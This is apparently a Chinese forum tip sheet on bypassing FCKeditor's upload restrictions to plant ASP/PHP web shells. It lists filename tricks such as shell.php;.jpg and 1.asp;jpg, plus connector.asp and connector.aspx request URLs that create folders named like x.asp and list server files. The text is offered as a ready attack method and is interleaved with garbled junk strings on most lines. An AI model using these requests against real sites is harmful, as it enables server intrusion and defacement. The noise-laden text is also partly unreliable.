很多时候上传的文件例如:shell.php.rar 或 shell.php;.jpg 会变为 shell_php;.jpg 这是新版 FCK 的变化,试试上传 1.asp;jpg- p$ b; H: G8 y' |: n" H9 a
, U# ^, i1 ]5 H# }( W5 n. R
提交 shell.php+空格 绕过,不过空格只支持 win 系统 *nix 是不支持的,shell.php 和 shell.php+空格 是 2 个不同的文件,未测试。0 X3 W. F. O6 X" `' u
6 H3 K! `, k3 k
继续上传同名文件可变为 shell.php;(1).jpg,也可以新建一个文件夹,只检测了第一级的目录,如果跳到二级目录就不受限制。6 ?0 B/ G( W# e k
7 U( q m" h' E0 I: q: Y4 l7 y
突破建立文件夹:
# I3 q: e% P: v2 y* X8 s
1 ?) F! ^, y: a- X8 X" s! Meditor/FCKeditor/editor/filemanager/connectors/asp/connector.asp?Command=CreateFolder&Type=Image&CurrentFolder=/qing.asp&NewFolderName=x.asp
: Z+ K6 B* p$ d# w# w; \* Q: h3 \( c! J
参数:
8 {2 Q! n* F( T `+ M
. v Z5 r) D% A. R+ k当前目录名:CurrentFolder=/qing.asp ? A6 d5 ?/ `4 y
; h$ H4 \; ~. i0 m! ?* ]1 H新的目录名:NewFolderName=x.asp
! }4 ^4 y' j9 v1 A h+ r$ T3 W* ^ O4 M) e
其实很简单,在目录那里写 x.asp,然后点击新建目录在弹出来的对话框中随便写……. s$ c& X& S' m; ]
; F n& s, t- i+ v" F/ B j- C" }% |
那么 x.asp 就已经建立生成了,此方法百试百灵!3 x4 {/ v3 I* D# W9 y! ]
# r+ ?+ W5 U3 H& w+ ~9 v' e
新建文件夹参数 x.asp,基本都能搞定。, w! I- H; O9 q7 f2 R& d) M6 H
2 p3 h7 d( o* \2 V: t下面这句话是要在1.asp下建立2.asp,当不存在1.asp时会先创建,只过滤了目标目录的创建 而没有过滤不存在目录的创建" ^4 j% m; V) G
# B9 Y0 d0 X: V$ q7 X( @aspx/connector.aspx?Command=CreateFolder&Type=File&CurrentFolder=%2F1.asp&NewFolderName=2.asp$ N9 x$ o! ^: F$ L3 Z7 g
; @- u' k- A. X3 o获取文件列表
# \1 r4 O5 L/ u8 } aspx/connector.aspx?Command=GetFoldersAndFiles&Type=File&CurrentFolder=%2F' {2 ], x2 Y/ n1 P& V- o
* F |5 u0 r' }, M& {) o |